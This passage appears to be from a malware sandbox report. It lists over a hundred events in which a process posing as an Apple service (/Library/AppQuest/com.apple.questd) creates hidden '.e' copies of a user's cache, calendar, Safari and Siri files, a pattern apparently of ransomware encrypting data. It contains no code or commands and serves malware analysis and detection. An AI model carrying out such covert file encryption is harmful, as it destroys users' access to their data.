              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.keyboardservicesd/.Cache.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.coreservices.uiagent/.Cache.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.coreservices.uiagent/.Cache.db-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.coreservices.uiagent/.Cache.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.commerce.safari/.SafariLibrary.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.parsecd/.spotlight_stopword.map.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.commerce/.SoftwareMap.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.commerce/.PurchasedBooks.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.commerce/.UpdateOperationAudit.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.commerce/.updates.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.commerce/.PurchasedMedia.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.commerce/.UpdateOperationAuditInfoCache-5103B509-753A-41D3-BFD5-5ADB3A3AB8FA.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.cache_delete/.CacheDeleteRecentInfo_v2.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.cache_delete/.CacheDeleteAnalytics.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/net.java.openjdk.cmd/.Cache.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/net.java.openjdk.cmd/.Cache.db-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/net.java.openjdk.cmd/.Cache.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/Oracle.MacJREInstaller/.Cache.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/Oracle.MacJREInstaller/.Cache.db-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/Oracle.MacJREInstaller/.Cache.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.xamarin.fontconfig/.84c0f976e30e948e99073af70f4ae876-le64.cache-3.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.xamarin.fontconfig/.84c0f976e30e948e99073af70f4ae876-le32d4.cache-3.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.xamarin.fontconfig/.b0a71e6bf6a8a1a908413a823d76e21f-le64.cache-3.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.xamarin.fontconfig/.b0a71e6bf6a8a1a908413a823d76e21f-le32d4.cache-3.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.corelocationagent.sfl.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.oracle.macjreinstaller.sfl.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.keyboardsetupassistant.sfl.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.maps.sfl.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.mail.sfl.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.installassistant.mojave.sfl.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.cloudphotosd.sfl.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.net.java.openjdk.cmd.sfl.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/7C0AB787-231F-4589-A778-D020F80743CC.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/7C0AB787-231F-4589-A778-D020F80743CC.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/80F5EE42-BD13-4C76-AF7B-D5B67DB0982D.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/80F5EE42-BD13-4C76-AF7B-D5B67DB0982D.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/E380CE29-FC53-41B4-8274-342A10683565.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/E380CE29-FC53-41B4-8274-342A10683565.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/5E432E28-F43A-4F44-ADCE-9ACE5FAB134F.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/5E432E28-F43A-4F44-ADCE-9ACE5FAB134F.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/5DA11817-A917-4E66-9D7D-7C3E0F9DE223.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/5DA11817-A917-4E66-9D7D-7C3E0F9DE223.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/E57CDCEE-89E5-476A-9037-A6D973A76488.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/E57CDCEE-89E5-476A-9037-A6D973A76488.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/438451CB-2554-4C3A-8B26-D0D56E4F2EC5.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/438451CB-2554-4C3A-8B26-D0D56E4F2EC5.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Logs/CoreTelephonyTraceScratch/CSI.scratch/.0x00000000-csi.txt.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.FD34EDFE67A924377D8A9DFE9A78A38A.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.1B03577ED104F16AADC00A639D33CB44.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.0A137B375CC3881A70E186CE2172C8D1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.BFDEF2879A3E4C99A8B5E1B3F955B2A6.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.7905D1C4E12C54933A44D19FCD5F9356.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.968FCB2E1F3E2C66C36FD5400694FA5F.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.E845CBDC3785B1A67978CBC5A146A168.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.D755C41AF03DF316AFF5F74BCD008648.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.660328A7F9004D462085AA67A82065DB.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.78C4C3399EC15E2AA7A3DF10FDA90BC1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/Touch Icons Cache/Images/.7C20A2B1534F33C9A5F66C656F9DF582.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesdataTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesdataTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesfinalTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesfinalTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesdataTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesfinalTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesfinalTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesfinalTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesedgeTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesedgeTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesedgeTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesedgeTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesedgeTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesfinalTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesdataTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesedgeTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesedgeTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesdataTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesfinalTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesdataTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesedgeTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesdataTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesdataTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesfinalTable.tdb.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.F544E7E4-DC44-4992-AA32-64B0AACA85D5.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.9F2A2A2B-E858-44A9-AB37-E9F9CAAAB210.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.AA207F95-4761-4CD9-A3EA-1605D77D5410.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.A96DA7DB-45DD-4CE6-9268-8683F6E040C0.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.174AD61D-7E21-473D-9667-1C67D4B6E670.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.C8615B06-CED8-410D-986F-8F7971EB698F.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.0291C6FC-F027-42D2-9884-CF0C6DC2845D.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.D6966C41-0E6D-4C96-8725-F737F6D4AE52.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.05117F4B-14AF-45CF-83EF-CF99B5DCF68D.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.61B51FBC-16F4-477C-96E7-75C87A33E798.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.FFC8148E-E094-4BEB-82A1-6EFE576FE87D.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.A7A2F409-F6C3-44ED-9859-72CDEEB15A96.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.2B7EA0E1-2310-4A5A-9147-3E3C1264EF04.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.C1DFE0E1-3B68-440A-8220-A7B5F8E240AC.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.07A13199-147E-4CBA-B834-186DB22E2B55.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.21E8A8F1-942B-4303-A336-E8CA4C57D00A.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.085DCC01-6895-4692-8EAD-956FBF5962C4.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.C4157816-627E-4225-A9FD-2C5E46CF7169.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.A6B6FE7F-ADCB-406B-934F-DD4384F24AF8.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.0B879FA2-1D5D-487B-9F38-A47A8D28D06B.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.6644E9F6-D242-42D3-98D1-485AE5C2F63B.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.5E5BAA37-7C33-427A-8BD1-E5CA17F08561.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.0FAA63CE-4DC8-4FFE-B817-C3983250D6EB.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.703FF13E-7073-46E3-8806-78EF4D8D2D8F.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.82471A98-AD6A-4875-89D8-7ABEB73BEA6A.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.70CE8F34-E030-4DF6-A02D-5AF5509884BA.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.E49511D2-0914-4340-9529-C62CDEBFB026.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.1A4BCAE4-6A68-4AA1-9EA7-0054B0A11D06.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.A428BFE7-0FA8-4532-9A02-8B659C5BEC05.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.94C21792-0BEE-4849-9C00-10FC483121EA.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.76D0A4AF-D762-476C-A65A-4AD7BF23AB54.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.FAA4DC3A-0A99-4436-BF3F-1022F1844DB0.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.8A45F420-2761-40EF-A7D1-B7296B66C1AA.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.EF800331-1827-42E1-99D6-A8EB01721BEA.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.F875B970-8B33-4980-B48D-48EED08CD892.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.017A6FDF-0959-413E-9AE0-DB4D5AB7538A.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.BD34BF61-066F-40B1-99DD-E069585D8C25.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.73CD0EA8-B203-4246-A3D6-6569224746D4.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.B9F6873E-0942-40DC-96CF-03DFC1C5212A.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.707351E8-3E00-493A-ADDD-61588D2FCBF8.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.5F138737-38C4-497C-BAF5-ECC173871910.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.5D5D1B19-5428-4BBD-9E3C-00384EA9F506.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.AFB9D202-C736-4E35-BE99-4A63821D6F9C.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.37BE9DB2-9E70-4030-AF7B-244D4DBBBD50.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.D69DF459-F718-4DA9-867B-8ACBE9F7FBDF.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.12A761BA-7F24-4417-92A6-408D944E5E55.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.396CDBC7-2564-4182-A6DA-CE4357EFE03E.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.798BF8D4-4DFF-4A44-8449-660CC6C56141.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.9BFC5D11-C309-4238-BB29-EFFB6CDC7CD9.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.262F6A45-8570-487A-8CCE-9A2A630640A0.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.2201A119-1E1A-4072-878E-5C3054FC346A.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.B51C4CD3-E0CE-4A1D-82D9-65AEF0DBC5FA.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.8E9DC67C-B867-4DC0-827E-D0C5E4BBFF82.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.FD903209-35B2-4084-9787-4F04A4A47668.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.44DBFA1A-BEA0-416A-A3BA-3949F5BE17EC.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.74458D3C-D0E0-4DC6-94E1-0B10280EEB2C.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.DABC55FC-2186-47D4-B6D8-29D64E0EE5F2.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.D6B9EC7A-068E-44A2-9133-60C8C7B21491.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.320D9CE0-EE03-4F53-9F48-1BEE1701EE69.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.7FD4DD02-29E8-4746-A485-ABF60F1E3604.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.155A11AA-DE5F-4CE3-A952-472364FA68D3.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.FA0D1E3D-C48E-4D35-8AB7-0FF0C6DB72ED.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.89D2DCA4-4F16-4F9D-95E5-1B48D62D883F.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.BD5C588D-B7C3-48CA-8F71-54DEC201E905.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.2E324B89-3B0E-4C08-B5BD-BB0EF772AC88.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.9E4F6ED2-9A62-4DFC-A453-CD23F4C49A57.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.8B0A0519-3E0D-492C-9625-09AA8F01B9E0.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.8506B47B-27B4-4786-9978-C03C0A0AFCCE.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.27EDE4E1-D2B2-4331-AB9A-AD59D0D67120.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.7CF147E8-6885-4EC9-A24A-43220D8E5D68.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.021865E7-27E1-4BF1-89CB-0FD08E15A2B7.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.CE546328-3559-4F5B-A84D-10D624796745.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.5DF0E37F-DF72-486B-B657-8E967F07A104.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.BEBFF984-55C0-4F7D-A55D-8F167D16DA70.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.2E3DD52A-C3DD-48C8-AD6E-F6799B07859E.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexCompactDirectory.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/..store.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.shadowIndexHead.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexPostings.e
